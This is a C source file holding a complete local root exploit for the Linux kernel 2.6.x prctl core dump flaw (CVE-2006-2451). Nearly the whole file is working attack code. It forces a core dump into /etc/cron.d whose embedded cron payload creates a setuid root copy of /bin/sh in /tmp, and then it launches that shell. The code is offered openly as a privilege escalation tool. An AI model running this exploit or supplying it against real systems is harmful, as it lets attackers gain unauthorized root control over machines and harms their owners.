rs_prctl_kernal.c

1. /*****************************************************/
2. /* Local r00t Exploit for:                           */
3. /* Linux Kernel PRCTL Core Dump Handling             */
4. /* ( BID 18874 / CVE-2006-2451 )                     */
5. /* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */
6. /* By:                                               */
7. /* - dreyer    <[email protected]>   (main PoC code)   */
8. /* - RoMaNSoFt <[email protected]> (local root code) */
9. /*                                  [ 10.Jul.2006 ]  */
10. /*****************************************************/
11.  
12. #include <stdio.h>
13. #include <sys/time.h>
14. #include <sys/resource.h>
15. #include <unistd.h>
16. #include <linux/prctl.h>
17. #include <stdlib.h>
18. #include <sys/types.h>
19. #include <signal.h>
20.  
21. char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
22.  
23. int main() {
24.     int child;
25.     struct rlimit corelimit;
26.     printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
27.     printf("By: dreyer & RoMaNSoFt\n");
28.     printf("[ 10.Jul.2006 ]\n\n");
29.  
30.     corelimit.rlim_cur = RLIM_INFINITY;
31.     corelimit.rlim_max = RLIM_INFINITY;
32.     setrlimit(RLIMIT_CORE, &corelimit);
33.  
34.     printf("[*] Creating Cron entry\n");
35.  
36.     if ( !( child = fork() )) {
37.         chdir("/etc/cron.d");
38.         prctl(PR_SET_DUMPABLE, 2);
39.         sleep(200);
40.         exit(1);
41.     }
42.  
43.     kill(child, SIGSEGV);
44.  
45.     printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
46.     sleep(62);
47.  
48.     printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
49.     system("/tmp/sh -i");
50. }